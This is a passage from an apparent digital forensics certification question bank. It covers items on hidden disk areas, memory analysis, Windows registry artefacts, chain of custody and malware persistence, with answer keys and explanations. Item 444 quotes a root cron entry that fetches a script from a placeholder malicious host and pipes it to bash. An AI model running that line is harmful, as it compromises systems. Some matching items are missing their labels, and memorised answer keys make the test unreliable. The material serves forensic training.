AnswerD

Frye focuses on general acceptance.

Why this answer

The Frye standard requires that scientific evidence be based on principles and methods that are generally accepted by the relevant scientific community.

426
MCQhard

An analyst retrieves a forensic image of a hard drive and discovers that the size reported by the operating system is smaller than the actual physical capacity. The extra space is not accessible through standard partition tools. This hidden area is MOST likely:

A.Device Configuration Overlay
B.Host Protected Area
C.Volume slack
D.RAM slack
AnswerB

HPA is a hidden area configured via ATA commands.

Why this answer

The Host Protected Area (HPA) is an area on the hard drive that is not accessible through standard ATA commands. It can be used to hide data.

427
MCQhard

During an investigation, an analyst uses the `volatility -f mem.dmp windows.pslist` command and observes a process named 'svchost.exe' with PID 1234. Further analysis shows that this process has no parent process (PPID = 0). What is the MOST likely explanation for this anomaly?

A.The process is a child of the System process (PID 4) but Volatility misreported it
B.The process belongs to a different session and Volatility failed to resolve the parent
C.The process is a legitimate system process that was started during boot
D.The process has been hidden using a rootkit that manipulated kernel objects (DKOM)
AnswerD

DKOM can alter the EPROCESS block to hide a process, often resulting in PPID=0.

Why this answer

In Windows, only the Idle process (PID 0) and System process (PID 4) typically have PPID 0. A user-mode process like svchost.exe with PPID 0 suggests the process list has been tampered with, often by rootkit techniques such as DKOM.

428
MCQmedium

A forensic analyst is examining an Android device that was factory reset before seizure. Which Google account artefacts are MOST likely still recoverable from the device's storage?

A.All installed application APK files
B.Full SMS message history
C.Google account authentication tokens and cached account data
D.Encryption keys for user data partition
AnswerC

Auth tokens and cached account info can persist in /data/system/ or unallocated space even after factory reset.

Why this answer

Factory reset on Android typically wipes user data partitions (e.g., /data) but does not securely overwrite the entire flash storage. Google account authentication tokens (e.g., OAuth 2.0 tokens) and cached account data (e.g., account names, sync settings) are often stored in system-level databases or encrypted key stores that may persist in unallocated or residual flash blocks, especially if TRIM or secure erase was not executed. These artefacts can be recovered via forensic imaging and carving of the raw NAND or eMMC.

Exam trap

EC-Council often tests the misconception that a factory reset securely erases all user data, when in reality residual artefacts like authentication tokens can persist in unallocated flash storage due to incomplete overwrite or lack of TRIM execution.

How to eliminate wrong answers

Option A is wrong because APK files are stored in the /data/app directory, which is part of the user data partition that is wiped during a factory reset; residual APK fragments are rarely recoverable in a complete, installable form. Option B is wrong because SMS messages are stored in the /data/data/com.android.providers.telephony/databases/mmssms.db file, which is also on the user data partition and is deleted during reset; while some fragments may remain in unallocated space, full message history is not reliably recoverable. Option D is wrong because encryption keys for the user data partition (e.g., FBE or FDE keys) are stored in the device's hardware-backed keystore or TEE and are cryptographically invalidated or wiped during factory reset, making them unrecoverable.

429
MCQeasy

Which of the following BEST describes the chain of custody in digital forensics?

A.The software tool used to image the hard drive.
B.A log of all personnel who have accessed the evidence, along with timestamps and reasons.
C.The process of encrypting evidence to prevent unauthorized access.
D.The physical lock and key used to secure the evidence locker.
AnswerB

This captures the essence of chain of custody.

Why this answer

Chain of custody is a documented record that tracks the seizure, custody, control, transfer, analysis, and disposition of evidence, ensuring its integrity and admissibility.

430
MCQmedium

A security analyst suspects malware infection on a Windows workstation. They run Process Monitor and observe that a process named 'svch0st.exe' creates a mutex named 'Global\Mutex_1234' and writes to the registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which malware persistence mechanism is being used?

A.Scheduled task creation
B.Service installation
C.DLL search order hijacking
D.Run key persistence
AnswerD

The Run registry key is a common persistence location for malware to launch on user logon.

Why this answer

The process 'svch0st.exe' writes to the registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run', which is a classic Run key used for automatic program execution at user logon. This is the most common malware persistence mechanism, as any executable referenced there will start each time the user logs in. The creation of a mutex named 'Global\Mutex_1234' is a common anti-reinfection technique to ensure only one instance of the malware runs, but the persistence is established via the Run key.

Exam trap

EC-Council often tests the distinction between user-level persistence (HKCU Run key) and system-level persistence (HKLM Run key or service installation), and candidates may confuse the 'Run' key with scheduled tasks or services because all three can launch executables at startup.

How to eliminate wrong answers

Option A is wrong because scheduled task creation uses the Task Scheduler service and writes to the '\Windows\System32\Tasks' directory or the 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache' registry key, not to the 'Run' key. Option B is wrong because service installation requires writing to 'HKLM\SYSTEM\CurrentControlSet\Services' and typically uses the 'CreateService' API, not the 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' key. Option C is wrong because DLL search order hijacking involves placing a malicious DLL in a directory searched before the legitimate DLL (e.g., the application's directory or the current working directory) and does not involve writing to a Run registry key or creating a mutex.

431
MCQmedium

A malware analyst runs a suspicious executable in Cuckoo Sandbox. The report shows that the process created a mutex named 'Global\MyMalwareMutex'. What is the significance of this mutex?

A.It is used to communicate with a remote command and control server
B.It prevents multiple instances of the malware from running simultaneously
C.It indicates the malware is packed with UPX
D.It stores encrypted configuration data
AnswerB

A mutex ensures only one instance of the malware runs to avoid conflicts.

Why this answer

The mutex named 'Global\MyMalwareMutex' is a named synchronization object used by the malware to ensure only one instance of its process runs at a time. This prevents conflicts in operations like file writing or network communication that could occur if multiple copies executed simultaneously. In Cuckoo Sandbox, detecting such a mutex is a common indicator of single-instance malware behavior.

Exam trap

EC-Council often tests the misconception that any named object with 'Global' implies network or cross-system communication, but in Windows, 'Global\' simply refers to the kernel object namespace accessible to all sessions on the same machine.

How to eliminate wrong answers

Option A is wrong because mutexes are local synchronization primitives within the Windows kernel, not network communication channels; C2 communication typically uses sockets, HTTP, or DNS. Option C is wrong because UPX packing is detected by analyzing the executable's section names (e.g., 'UPX0', 'UPX1') or entropy, not by mutex creation. Option D is wrong because mutexes do not store data; they are kernel objects with a name and state (signaled/non-signaled), whereas encrypted configuration is usually stored in files, registry keys, or memory.

432
Matchingmedium

Match each network protocol to its well-known port number (TCP/UDP).


Concepts
Matches

21

23

161

389

3389

Why these pairings

These are standard port numbers assigned by IANA.

433
MCQmedium

During a forensic examination, an analyst uses Autopsy to view the contents of the Recycle Bin on a Windows 10 system. However, some files that were deleted by the user do not appear in the Recycle Bin. What is the MOST likely reason?

A.The Recycle Bin stores only files smaller than 1 GB
B.The files were encrypted
C.The files were deleted using Shift+Delete
D.The Recycle Bin was emptied
AnswerC

Shift+Delete bypasses Recycle Bin.

Why this answer

Files deleted using Shift+Delete bypass the Recycle Bin and are directly marked for deletion. Additionally, files deleted from the command line or from external drives may not go to the Recycle Bin.

434
MCQmedium

In a Windows forensic investigation, the analyst wants to determine which USB devices were connected to the system, including the device serial number and first/last connection times. Which registry hive and key should be examined?

A.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
B.NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C.HKLM\SAM\SAM\Domains\Account\Users
D.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
AnswerD

This key contains subkeys for each USB storage device with serial number and connection times.

Why this answer

USB device history is stored in the SYSTEM registry hive under USBSTOR, which records device class, serial number, and timestamps.

435
MCQmedium

During incident response, a first responder discovers a compromised system with signs of an active command-and-control (C2) connection. What is the MOST important immediate action to preserve evidence and prevent further damage?

A.Create a full disk image before taking any other action.
B.Disconnect the network cable to isolate the system from the network.
C.Immediately shut down the system to prevent further data exfiltration.
D.Run a full antivirus scan to remove the malware.
AnswerB

Disconnecting the network cable stops C2 communication, preserves volatile data, and allows for a controlled forensic acquisition.

Why this answer

Option B is correct because disconnecting the network cable immediately stops the active C2 communication, preventing further data exfiltration and command injection while preserving the current state of memory and disk. This action maintains the integrity of volatile evidence (e.g., network connections, running processes) and avoids the data loss that would occur with a shutdown or the evidence contamination that would result from running a scan.

Exam trap

EC-Council often tests the misconception that a full disk image is always the first priority, but in an active C2 scenario, network isolation must come first to prevent ongoing damage and preserve volatile evidence.

How to eliminate wrong answers

Option A is wrong because creating a full disk image before isolating the system allows the active C2 connection to continue exfiltrating data and potentially destroying evidence during the imaging process. Option C is wrong because immediately shutting down the system destroys volatile evidence (e.g., network connections, running processes, memory-resident malware) and may trigger anti-forensic mechanisms that wipe logs or encrypt data. Option D is wrong because running a full antivirus scan modifies the system state (e.g., file access times, registry keys) and may alert the attacker, causing them to terminate the C2 session or trigger a kill switch, thereby losing evidence of the active connection.

436
MCQmedium

During an investigation, an analyst recovers a file from unallocated space that contains fragments of a deleted document. The file size is 512 bytes, but the cluster size of the volume is 4096 bytes. What is the term for the unused bytes between the end of the file and the end of the last cluster?

A.Volume slack
B.Drive slack
C.File slack
D.RAM slack
AnswerC

Correct: File slack is the unused space in the last cluster after the file ends.

Why this answer

File slack is the space between the end of the logical file and the end of the last cluster allocated to it.

437
MCQhard

A security analyst reviews the following Windows Event log entry: Event ID 4648 with logon type 3, subject user 'CONTOSO\admin', target server 'FS01', target user 'CONTOSO\backupadmin'. What does this event indicate?

A.A user account was created for backupadmin on FS01
B.A service was installed under the backupadmin account
C.An explicit credential logon was performed to access FS01 using the backupadmin account
D.The backupadmin account locked out due to multiple failed attempts
AnswerC

Event ID 4648 with the explicit-credential flag indicates RunAs or similar usage, and logon type 3 confirms a network logon.

Why this answer

Event ID 4648 records when explicit credentials are used to log on, typically for RunAs or scheduled tasks. Logon type 3 indicates a network logon. This means admin used backupadmin credentials to access FS01.

438
MCQhard

An analyst is investigating a Linux server that suffered a data breach. The attacker deleted several log files. The analyst runs `debugfs /dev/sda1` and issues the command `lsdel`. What is the purpose of this command in the context of file recovery?

A.List inodes of deleted files that still have allocated blocks
B.Recover deleted files from the journal
C.List all deleted directory entries in the journal
D.Display the current superblock information
AnswerA

Correct. lsdel shows inodes of deleted files with allocated blocks for potential recovery.

Why this answer

debugfs is a tool for ext2/3/4 filesystem debugging. The `lsdel` command lists inodes of deleted files that still have allocated blocks, enabling recovery.

439
MCQmedium

A first responder arrives at a suspected intrusion scene. A desktop computer is powered on and logged in. The user claims they saw suspicious files being copied to a USB drive. Which of the following should the first responder do FIRST?

A.Capture volatile data such as memory and running processes.
B.Power off the computer immediately to prevent further data loss.
C.Photograph the scene and document everything in a notebook.
D.Create a forensic image of the hard drive using a write blocker.
AnswerA

Volatile data (RAM, processes, network connections) is lost when power is removed, so it must be collected first.

Why this answer

The first priority is to preserve volatile data (e.g., memory, running processes) which may be lost if the system is powered off. Photographing the scene and documenting are important but come after securing volatile data.

440
Multi-Selectmedium

Which TWO tools are commonly used for file carving during a forensic investigation?

Select 2 answers
A.fdisk
B.Autopsy
C.LiME
D.Scalpel
E.Foremost
AnswersD, E

Why this answer

Foremost and Scalpel are dedicated file carving tools that recover files based on headers/footers. fdisk is a partition tool, Autopsy is a forensic suite that can use carving but is not primarily a carver, and LiME is for memory acquisition.

441
Matchingmedium

Match each forensic acquisition method to its description.


Concepts
Matches

Collecting data from a running system

Collecting data from powered-off media

Copying only active files and metadata

Bit-for-bit copy of entire storage device

Collecting only fragments of unallocated space

Why these pairings

These methods differ in scope and when they are performed.

442
MCQhard

A forensic analyst is examining a Windows system and finds a prefetch file named NOTEPAD.EXE-12345678.pf. What information can be gleaned from this artifact? (Select the BEST answer.)

A.It saves a copy of the application's configuration
B.It logs all network connections made by the application
C.It records the application's execution count and last run time
D.The file contains the user's password for the application
AnswerC

Prefetch stores run count and timestamps.

Why this answer

Prefetch files contain the number of times the application was run, last run time, and a list of files loaded during execution. They do not store network connections or user-specific data.

443
MCQhard

In a RAID 5 array with three disks, one disk fails. The investigator images the remaining two disks and wants to reconstruct the missing data. Which approach is most appropriate?

A.Apply XOR operation between the two disk images to recover missing data
B.Mount the two disks in a Linux mdadm array with a missing disk
C.Use dd to concatenate the two disk images linearly
D.Use a tool like R-Studio to perform a virtual RAID rebuild
AnswerA

RAID 5 XOR parity can reconstruct missing data from remaining disks.

Why this answer

RAID 5 uses parity distributed across disks. Given two data disks, the third can be reconstructed by XORing the parity with the remaining data. However, the investigator must know the stripe size and parity layout.

444
MCQmedium

During an incident response, an analyst finds the following entry in /etc/crontab: */5 * * * * root /bin/bash -c 'curl -s http://malicious.com/script.sh | bash'. What is the MOST likely purpose of this entry?

A.Persistence mechanism to maintain access
B.Log cleanup tool
C.System backup script
D.Software update process
AnswerA

Correct. This ensures the attacker's code runs repeatedly.

Why this answer

The cron job runs every 5 minutes as root, downloading and executing a script from a remote server. This is a typical persistence mechanism for a backdoor or command-and-control.

445
Multi-Selectmedium

Which TWO of the following are essential components of chain of custody documentation?

Select 2 answers
A.Every person who handled the evidence must sign and date the form
B.A detailed description of the evidence including make, model, and serial number
C.The forensic tool used to analyze the evidence
D.The evidence must be stored in a fireproof safe
E.The final analysis report
AnswersA, B

This documents the chain of custody.

Why this answer

Option A is correct because chain of custody documentation must record every individual who handled the evidence, along with their signature and the date/time of transfer, to establish an unbroken custody trail. This ensures the evidence's integrity and admissibility in court by demonstrating who had access at each stage.

Exam trap

EC-Council often tests the distinction between what belongs in chain of custody documentation versus what belongs in the forensic analysis report or security procedures, leading candidates to mistakenly include analysis tools or storage specifications.

446
MCQeasy

What is the PRIMARY purpose of a chain of custody document in a forensic investigation?

A.To provide a chronological record of who handled the evidence, when, and why.
B.To document the tools used during the investigation.
C.To list all the files found on the suspect's computer.
D.To authorize the search and seizure of digital evidence.
AnswerA

This establishes the integrity and continuity of evidence from collection to court.

Why this answer

The chain of custody document is the foundational record that ensures evidence integrity and admissibility in court. Its primary purpose is to create a chronological, unbroken log of every person who handled the evidence, the exact time and date of each transfer, and the reason for the transfer. This directly supports the legal requirement to prove that the evidence has not been tampered with or altered from the moment of seizure to its presentation in court.

Exam trap

EC-Council often tests the distinction between the chain of custody (which tracks handling history) and the search warrant (which grants legal authority), causing candidates to mistakenly choose the authorization option.

How to eliminate wrong answers

Option B is wrong because documenting the tools used during the investigation is a separate activity, typically recorded in a forensic workstation log or case notes, not in the chain of custody form. Option C is wrong because listing files found on a suspect's computer is the output of forensic analysis (e.g., a file listing from a tool like FTK Imager or EnCase), not the purpose of the chain of custody document. Option D is wrong because authorization for search and seizure is obtained via a legal warrant or consent form, not through the chain of custody; the chain of custody begins after the evidence has been legally seized.

447
Multi-Selectmedium

Which TWO Windows registry hives are most commonly analyzed during a forensic investigation to determine user activity and system configuration? (Select TWO.)

Select 2 answers
A.HKLM\SAM
B.HKU\.DEFAULT
C.HKLM\COMPONENTS
D.HKLM\BCD
E.HKCU\...\NTUSER.DAT
AnswersA, E

Contains user account information and password hashes.

Why this answer

SAM stores user account hashes, NTUSER.DAT contains user-specific settings, SYSTEM stores system configuration, SOFTWARE stores installed software info.

448
MCQmedium

During a forensic examination of a macOS system, an investigator wants to review application execution history. Which artifact contains a chronological record of application launches, including timestamps and process IDs?

A.FSEvents
B.com.apple.launchd.plist
C.syslog
D.Unified logging (log command)
AnswerD

Unified logging captures process lifecycle events via the 'log' command.

Why this answer

macOS unified logging provides detailed system activity including application launches. FSEvents records file system changes but not process launches. .plist files may store settings, not execution history.

449
MCQhard

An incident responder examines a Linux server and finds a suspicious cron job that runs every minute and executes a script located in /tmp. Which persistence technique does this represent?

A.Kernel rootkit
B.Web shell
C.SSH key backdoor
D.Cron-based persistence
AnswerD

Cron jobs execute at scheduled intervals, used for persistence.

Why this answer

Cron jobs are a common persistence mechanism on Linux. Attackers often use frequent cron jobs to maintain access.

450
MCQmedium

Which of the following email headers is used to verify the domain of the sending server and is commonly used for authentication to prevent spoofing?

A.Content-Type
B.Received
C.X-Mailer
D.DKIM-Signature
AnswerD

DKIM-Signature provides a digital signature for domain verification.

Why this answer

The DKIM-Signature header contains a cryptographic signature that allows the receiver to verify that the email was not modified and is from the claimed domain, helping prevent spoofing.
